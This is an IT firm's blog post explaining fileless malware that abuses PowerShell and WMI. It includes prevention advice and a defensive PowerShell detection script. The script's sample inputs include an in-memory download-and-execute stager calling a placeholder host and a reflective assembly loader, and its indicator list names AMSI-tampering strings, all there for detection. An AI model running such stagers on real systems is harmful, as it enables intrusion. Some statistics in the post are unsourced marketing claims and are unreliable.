NEWS FROM THE EDGE

Tech Tips and Advice from the Experts at Dynamic Edge

Why Fileless Malware Is Worrying Security Experts

The attack technique gaining the most traction among cyber criminals, and the one most likely to strike your business, is also one of the hardest to detect.

It’s nothing new. Fileless malware has been around for quite some time, but its popularity is quickly growing among cyber criminals with targets on business networks.

Because it is stealthy, efficient and very capable of evading the conventional security controls most businesses have in place (signature-based antivirus, traditional firewalls), fileless malware is becoming the ‘go-to’ for attacks on enterprise-grade systems.

Today I want to spend a few minutes on why fileless malware has become so big in the cybercrime community and what you can do to protect yourself from becoming the next organization to fall to its devastating effects.

But first, what exactly is fileless malware?

Unlike traditional malware, fileless variants don’t rely on installing a malicious program on the target machine. Instead, the attacker’s code runs in memory through tools that are already built into the operating system (in most cases Windows), hijacking them to carry out the attack. When it needs to survive a reboot, it typically hides in places like the registry or a WMI event subscription rather than as an executable on disk. You can sort of think of this type of attack as Windows being brainwashed to turn against itself.

The real heart of the problem with fileless malware is that there is no file on disk for antivirus to scan, and therefore no signature to match. Even though antivirus and detection software have become more sophisticated at identifying malicious behavior, the reality is that detecting fileless malware continues to be quite challenging.

How does fileless malware run?

Basically, fileless malware attacks abuse default Windows tools—specifically PowerShell and Windows Management Instrumentation (WMI)—and use them to carry out the attacker’s commands. PowerShell and WMI are the same tools IT teams use to automate tasks across a network and keep entire fleets of computers maintained. Because they are built into Windows and woven into standard IT workflows, banning or removing them is considerably harder than you’d initially think: PowerShell cannot simply be uninstalled, and WMI is a core Windows component.

Since attackers are running their code through legitimate, Microsoft-signed programs, file-based antivirus and many of the security products in production today frequently see nothing to flag.

The real problem with attackers abusing PowerShell or WMI is that both run with whatever privileges the user who launched them has. Once a criminal is running PowerShell or WMI as an administrator on one machine, they have near carte-blanche access to that machine and can use the same tools to reach the rest of your network.

Today, fileless malware represents over half of attempted attacks. Since this type of attack doesn’t write code to disk, it is ideal for larger networks and for stealthy movement between machines: PowerShell remoting and WMI traffic from one host to another looks exactly like routine administration.

How can you prevent a fileless malware attack?

Patching your network—basic network hygiene is one of the easiest ways to prevent fileless malware from getting a foothold in the first place, since the initial entry often comes through a known, unpatched vulnerability. The problem most organizations have is that their IT teams are so busy fighting fires that they overlook the essential work of maintaining a secure network. Nearly every business I’ve audited in the past 6 months has had at least 5 vulnerabilities that put them at nearly 60 times the risk of getting infected with a ransomware virus. Making sure your patches are up to date, and that updates are consistently tested and deployed, is one of the surest ways to keep your business from getting infected.

Training your team—the second-most popular way cyber criminals are penetrating networks and delivering fileless malware is through phishing emails and social engineering. Team members are quite easily tricked into giving up passwords or sensitive information, or into clicking links or opening attachments that deliver the payload (often a document whose macro quietly launches PowerShell). Getting them to understand and identify scams is more critical than ever. [Note: we provide FREE cybersecurity training every other month. Call and ask about how you can attend!]

Monitoring for suspicious activity—even though signature-based antivirus and conventional security tools are unable to detect fileless malware, behavior-based detection can certainly keep an attack from becoming disastrous. Because the abuse happens inside PowerShell and WMI on the endpoint itself, the most useful telemetry is on the host: PowerShell script block logging (Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log) and the WMI activity log, alongside watching the perimeter for unusual outbound traffic. Having protection that understands normal activity and flags abnormal use of common tools like WMI or PowerShell could help you detect and prevent a massive ransomware attack from hitting your business. [Ask us how fitSecure could keep your team safe!].
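The following PowerShell is an added example written for this article, not code from Dynamic Edge or from any product mentioned here. It shows the host-side checks the three steps above point at: turning on the script block logging that makes PowerShell abuse visible, scoring logged script blocks (or process command lines) for indicators that are common in fileless loaders and rare in admin scripts, and enumerating the permanent WMI event subscriptions that fileless malware uses for persistence. The indicator names, weights and the threshold of 4 are this example’s own choices, and the three sample script blocks at the bottom are constructed for demonstration; the event ID, log name, registry key and WMI classes are the real Windows ones.

```powershell
# Added example: host-side detection of PowerShell/WMI abuse.
# Indicator names, weights and the "suspicious" threshold are this example's
# own choices, not a vendor rule set. Run in an elevated PowerShell session
# for the logging and event-log functions; the scorer itself runs anywhere.

# Text indicators. The scorer is generic text matching, so it works on
# Event ID 4104 ScriptBlockText as well as on process command lines
# (Event ID 4688 with command-line auditing enabled).
$Indicators = @(
    @{ Name = 'EncodedCommand';   Weight = 3; Pattern = '-e(nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}' }
    @{ Name = 'HiddenWindow';     Weight = 1; Pattern = '-w(indowstyle)?\s+hidden' }
    @{ Name = 'NoProfile';        Weight = 1; Pattern = '-nop(rofile)?\b' }
    @{ Name = 'DownloadString';   Weight = 3; Pattern = '\.DownloadString\(|Invoke-WebRequest|\biwr\b' }
    @{ Name = 'InvokeExpression'; Weight = 2; Pattern = 'Invoke-Expression|\biex\b' }
    @{ Name = 'Base64Decode';     Weight = 2; Pattern = 'FromBase64String' }
    @{ Name = 'ReflectiveLoad';   Weight = 3; Pattern = '\[System\.Reflection\.Assembly\]::Load|Reflection\.Assembly' }
    @{ Name = 'AmsiTamper';       Weight = 4; Pattern = 'amsiInitFailed|AmsiUtils' }
)

function Get-ScriptBlockRisk {
    # Score one script block / command line against the indicator table.
    param([Parameter(Mandatory)][string]$Text)
    $hits = foreach ($i in $Indicators) { if ($Text -match $i.Pattern) { $i } }
    $score = 0
    foreach ($h in $hits) { $score += $h.Weight }
    $preview = $Text
    if ($Text.Length -gt 80) { $preview = $Text.Substring(0, 80) + '...' }
    [pscustomobject]@{
        Score      = $score
        Suspicious = ($score -ge 4)          # threshold chosen for this example
        Indicators = ($hits.Name -join ', ')
        Preview    = $preview
    }
}

function Enable-ScriptBlockLogging {
    # Same effect as the Group Policy setting
    # "Turn on PowerShell Script Block Logging". Needs an elevated shell.
    $key = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'
    if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
    Set-ItemProperty -Path $key -Name EnableScriptBlockLogging -Value 1 -Type DWord
}

function Get-SuspiciousScriptBlocks {
    # Pull recent 4104 events and keep the ones the scorer flags.
    param([int]$MaxEvents = 500)
    Get-WinEvent -FilterHashtable @{
        LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104
    } -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
    ForEach-Object {
        # In event 4104, Properties[2] is the ScriptBlockText field.
        $r = Get-ScriptBlockRisk -Text ([string]$_.Properties[2].Value)
        if ($r.Suspicious) {
            $r | Add-Member -NotePropertyName Time -NotePropertyValue $_.TimeCreated -PassThru
        }
    }
}

function Get-WmiPersistence {
    # Permanent WMI subscriptions live in root\subscription as a filter
    # (WQL trigger), a consumer (what runs) and a binding between them.
    # A default Windows install normally has only the "SCM Event Log"
    # filter/consumer pair; review anything else, especially
    # CommandLineEventConsumer and ActiveScriptEventConsumer instances.
    $ns = 'root\subscription'
    foreach ($class in '__EventFilter', '__EventConsumer', '__FilterToConsumerBinding') {
        Get-CimInstance -Namespace $ns -ClassName $class -ErrorAction SilentlyContinue |
        ForEach-Object {
            [pscustomobject]@{
                Class   = $_.CimClass.CimClassName   # concrete class, e.g. CommandLineEventConsumer
                Name    = $_.Name
                Query   = $_.Query                   # __EventFilter only
                Command = $_.CommandLineTemplate     # CommandLineEventConsumer only
                Script  = $_.ScriptText              # ActiveScriptEventConsumer only
            }
        }
    }
}

# Constructed sample script blocks (not real captured data): one routine
# admin one-liner, one in-memory download-and-execute stager, one
# base64-decode-and-reflectively-load pattern.
$Samples = @(
    'Get-Service | Where-Object Status -eq Running | Export-Csv C:\reports\svc.csv'
    'IEX (New-Object Net.WebClient).DownloadString(''http://example.invalid/stage2.ps1'')'
    '$b=[Convert]::FromBase64String($p);[System.Reflection.Assembly]::Load($b).EntryPoint.Invoke($null,$null)'
)
$Samples | ForEach-Object { Get-ScriptBlockRisk -Text $_ } |
    Format-Table Score, Suspicious, Indicators, Preview -AutoSize

# On a real host, after Enable-ScriptBlockLogging has been in effect:
#   Get-SuspiciousScriptBlocks | Format-Table Time, Score, Indicators, Preview
#   Get-WmiPersistence | Format-List
```

The scorer is deliberately simple: it trades false positives for coverage, so treat a hit as a prompt to read the full script block, not as a verdict. Script block logging records the de-obfuscated code PowerShell actually executes, which is why it is worth more than watching the command line alone, and the WMI enumeration is cheap enough to run across every host as part of a routine check.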

One of the most common misconceptions in the business community is that “I’m safe because I have antivirus” or “something like this will never happen to me”. The cold reality is that criminals are targeting business networks with greater force in 2018 than ever before. And the ones that think they’re safe are the easiest targets because their IT guys are likely not diligently monitoring their networks and probably aren’t educating their users about attacks that antivirus will never detect.

Are you certain your business is secure? Contact us TODAY for a free 37-point ransomware assessment.
